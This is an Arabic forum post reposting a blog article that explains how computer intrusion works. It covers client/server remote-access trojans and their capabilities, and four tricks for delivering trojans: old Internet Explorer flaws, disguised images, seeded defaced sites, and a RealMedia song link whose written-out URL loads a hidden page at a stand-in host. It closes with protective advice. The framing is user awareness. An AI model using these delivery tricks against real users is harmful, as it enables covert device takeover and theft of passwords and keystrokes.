.والله اليوم وانا اقلب في النت ما ادري ايش طسطست انفتحت معاي مدونه اسمها
مدونة الدكتور شخبوط [بدر شفاقة]
ومره عجبتني المدونه شوفوا هذا موضوع منها
اليوم وبكل بساطه موضوعنا عن الاختراق .. والغرض ليس تعليمي .. وانما غرض حمايه بنسبه 90 % وغرض الاطّلاع على خدع اختراق الاجهزه ولكي يكون المستخدم العادي يستطيع حمايه نفسه وعلى معرفه بما يدور حوله في عالم الانترنت
هذا الموضوع لن يكون موضوع يتيم ،، وانما سوف تكون سلسله من المواضيع بغرض حمايه اجهزه المستخدمين والابتعاد بقدر الامكان عن الاختراقات او التعرض لها وايضا ليكون المستخدم لديه على الاقل خلفيه عن ماهية الاختراق وطرق الحمايه منه وبعيدا عن التكلف والتعقيد واستخدام الطرق التى لايستطيع فهمها المستخدم العادي بسبب جهله بكثير من المصطلحات والافكار التى سوف ترد ضمن السياق
ربما تكون هذه الخدع قديمه نوعا لـ ظروف انقطاعي عن متابعه الهكر بالفترات الاخيره لأسباب كثيره ومنها الدراســه والاختبارات. ولكن بعض ماأعرفه عن هذه الخدع
نبدأ بسم الله
[ مفهوم الاختراق ]
هو القدره على الوصول الى هدف معين بطريقه غير مشروعه عن طريق ثغرات نظام الحمايه الخاص بالهدف وعندما نتكلم عن الاختراق بشكل عام نستطيع القول بأن الاختراق هو قدره المخترق على الدخول الى جهاز شخص ما بغض النظر عن الاضرار الناتجه عن ذلك الاختراق
[كيف يتم الاختراق ]
هو اختراق كأي اختراق اخر لشئ ما يستطيع من خلاله المخترق التطفل على اجهزه الاخرين من خلال الكثير من الطرق
طرق اختراق الاجهزه :
عن طريق برامج الاختراق وهي ابسط انواع اختراق الاجهزه والتي يمكن للمبتدئين استخدامها والتي تعتمد على نظام [ Clinent / Server ] حيث انهم ملفين احدهما يرسل الى الجهاز المراد اختراقه ،، والاخر العميل او Clinet يتم تشغيله من قبل المخترق لكي يستطيع التحكم في جهاز الشخص المراد اختراقه ..
اصبحت الملفات هذي عباره عن ملف واحد ،، وهو برنامج الاختراق ،، يستطيع انتاج ملف Server ويتم فيه وضع البورت [ المنفذ ] المراد فتحه في جهاز الضحيه او الجهاز المخترق .. ومن هذا الملف يمكن الاتصال عن طريق المنفذ المذكور سابقا ويتم الاتصال عن البرنامج الام ،، والذي يتحكم في الجهاز بعد الاتصال بالـ Server
ويتم تبيلغ المخترق بأنه تم اختراق الجهاز المراد ،، ويتيح له كامل التحكم بالجهاز ويستطيع القيام بالمهام التي تختلف من برنامج لأخر ،،
المهام التي يقوم بها البرنامج الام بعد الاتصال كثيره ومنها [ الكي لوجر ، تصوير الشاشه ، جلب الارقام السريه بالجهاز ، تصفح الجهاز ، تحميل الملفات من الجهاز المُخترق الى جهاز المخترق ، اغلاق جميع النوافذ التى يقوم بها الضحيه ( نوعا من المزح ) وغيرها الكثير ،، فمثلا تشغيل الكاميرا اذا كان الضحيه يملك جهاز به كاميرا .. ]
توضيح : الكي لوجر [ هو جلب كل مايقوم بالكتابه على الكيبورد ،، ارقام سريه او محادثات او ارقام فيزا كارد او غيرها ]
طبعا من غباء الهكر ارسال الملف [ الباتش ] .. هكذا من دون دمج او غيره .. الا على الضحايا الاغبياء ايضا
فـ من الغباء ان احد من مستخدمي الانترنت يستقبل ملف لا يعرف ماهو .. ومن ثم يقوم بفتحه على الجهاز وهو لايعلم ماهو هذا الملف او مايمكن ان يقوم به هذا الملف ..
بعض الخدع التي يمكن للهكر ان يجعل الباتش او التروجان يشتغل بها بعيد عن شكوك الضحيه ..
اولا : متصفحات الانترنت ،، وثغراتها .. [ طبعا بما ان اغلب المستخدمين يستخدمون نظام الويندز Windows فـ اغلب المتصفحات المستخدمه هي Internet Explorer من الاصدار السادس ،، والسابع ،، والثامن بيتا .. [ التجريبي ]
ويوجد بها الكثير من الثغرات وطريقه العمل بسيطه جدا
وهو رفع الباتش او التروجان على موقع مباشر ومن ثم وضعه في المكان المناسب له في صفحه الثغره
[ التعديل عليه بواسطه المذكره او الدفتر بالويندز ]
ومن ثم رفع الصفحه على اي موقع واعطائها للضحيه .. بمجرد الضغط على الصفحه والدخول اليها .. تقوم الثغره بالعمل .. ومن ثم تشغيل الباتش او التروجان تلقائي ..
الحيله الاخرى ، :
وضع الباتش في كود ،، ووضع صوره معه ايضا ،، وجعل الباتش في الصوره ،، مما يوهم الشخص بأن ذلك الرابط هو صوره فـ يقوم بالدخول عليه ومن ثم تقوم الصوره بتشغيل الباتش في الجهاز .. ويتم اختراق الجهاز ..
http://www.almgrat.net//uploads/imag...055c9877b0.gifومن ثم يقوم برفع الصوره على اي مركز رفع صوره .. حسب امتداد الصوره ..
ويصبح الرابط هكذا
www.xxx.com/up/24xkjd.gifهل احد منكم يشك في ذلك ..
ومن ثم يقوم بنشرها بجميع الدردشات ،، او غيرها ،، وغيرها .. بغرض الحصول على اشخاص مغفلين
الحيله الثالثه :
كثير من الاخوان يقومون بأختراق مواقع الانترنت وتعليق [ الاندكس ] على الصفحه الرئيسيه
ومن ثم جميع زوار هذا الموقع عندما يردون الدخول للموقع تظهر لهم عبارات ذلك المخترق ،،
من العبارات المستخدمه عند الاخوان الهكر .. [ تم اختراق ] .. او غيرها
اذا كان ذلك المخترق يريد اختراق اجهزه الزوار لهذا الموقع يقوم بـ [ تلغيم ] صفحه الاختراق بوضع رابط الباتش او التروجان في الصفحه ،، بالرجوع للحيله الاولى واختيار ثغره ،، ومن ثم تصميم صفحه الاختراق ،، ورفعها على الموقع
ومن ثم تصبح رئيسيه الموقع الاندكس + الباتش
واي زائر مسكين مغلوب على امره ،، يدخل الموقع المخترق ويتم نزل الباتش في جهازه
وبكذا يكون الهكر استفاد حاجتين ،، اختراق اجهزه زوار الموقع ،، ومنها جهاز مدير الموقع ،، والشي الثاني اختراق الموقع
الحيله الرابعه : تلغيم رابط اغنيه استماع ،، وضع رابط الباتش داخل الاغنيه ،، وتشغيله في جهاز الضحيه ..
الحيله تتلخص كلها في كود
http://song4.6rb.com/kw/alahmad/alahmad-te7ebbeenah.rm?rpcon****url=http://www.xxx.com/hack.html&rpcon****width=0&rpcon****height=0رابط الاغنيـه اولا ..
http://song4.6rb.com/kw/alahmad/alahmad-te7ebbeenah.rmتستطيع استبداله بأي رابط من عندك ،،
http://www.xxx.com/hack.htmlرابط الصفحه الملغومممـه ،، تستبدل برابط صفحتك الملغومممه ،،
ومن ثم تقوم بحفظ العمل بـ صغيه Ram
ومن ثم تقوم برفع الملف الناتج Ram على اي موقع ،، ونشر الرابط ..
الغريب في الامر ، ان كل هذه الخدع تنكشف من قبل برنامج ،، لم اكن اتوقع انه يستطيع كشفها
برنامج التحميل او تسريع التحميل Internet Download Manager
البرنامج هذا لايسمح لأي ملف في اي صفحه التشغيل المباشر .. ولكن بموافقه المستخدم ..
فمثلا ،، عن فتح صفحه ملغمه يقوم البرنامج بأظهار ماهو داخل الصفحه وهل توافق على تحميله ،، ام لا
هذه الصوره تبين وجود ملف Exe بهذه الصفحــه ،، ولا يقتصر على الملفات التنفيذيه فقط ،، في اعدادت هذا البرنامج تختار ايضا جميع الامتدادت التى ممكن ان تكون ضاره بالجهاز ،، مثل Exe ، Com وغيرها الكثير من الامتدادات التنفيذيه
ولكن البرنامج ،، لايتسطيع كشف الحيله الرابعه وهي تلغيم اغنيه استماع ،،
عندما تريد الدخول على رابط الاستماع ،، يعلمك بوجود ملف بـ صيغه Rm اي انه صيغه ملف اغنيـه ،،
وبالتأكيد لن يكون لديك ادنى شك بأن هذا الرابط او هذه الاغنيه ،، تحميل في طياتها ذلك الملف اللعين .. الذي يستطيع من خلاله الشخص للدخول الى جهازك ..
المقصود من كل ذلك مايلي :
1- تحديث متصفح الانترنت بشكل دوري وعدم استقبال اي رابط من اي شخص لايكون محل ثقه لديك
2- ايضا عدم استقبال اي صوره او رابط من اي شخص لاتثق به ،، وعدم الدخول ايضا على المواقع المخترقه من قبل المخترقين ،، وممكن ان يكون لديك فضول بأن هذا الموقع اخترق ..
3- الاغاني الموجوده في الدردشـات .. او في الماسنجر ،، من اي شخص ،، تكون مشبوهه ايضا الا اذا كان الشخص محل ثقه ..
4- الابتعاد بقدر الامكان عن دخول الصفحات المشبوهه والمواقع المخترقه .. لأنها قد تكون محموله بالفايروسات والباتشات التى من ممكن قد تعرض جهازك للخطر
5- اطلاع وتثقيف المستخدم على كل طرق الاختراق وطرق الحمايه منها ..
6- من وجهه نظري الاقوى حمايه هو كاسبر ولكن كاسبر المرخص ،، اي شراء كاسبر من مكتبه جرير او اي محل كمبيوتر ،، اصلي .. وليس منزوع او مفاتيح يوميه ،،7- الاقوى حمايه هو كاسبر انترنت سيكورتي .. لأنه يجمع بين كاسبر انتي فايروس + كاسبر انترنت سكيورتي
.تحياتي لكم
نور الدين
موضوع: مفهوم الهكر 
الجمعة ديسمبر 14, 2012 3:36 pm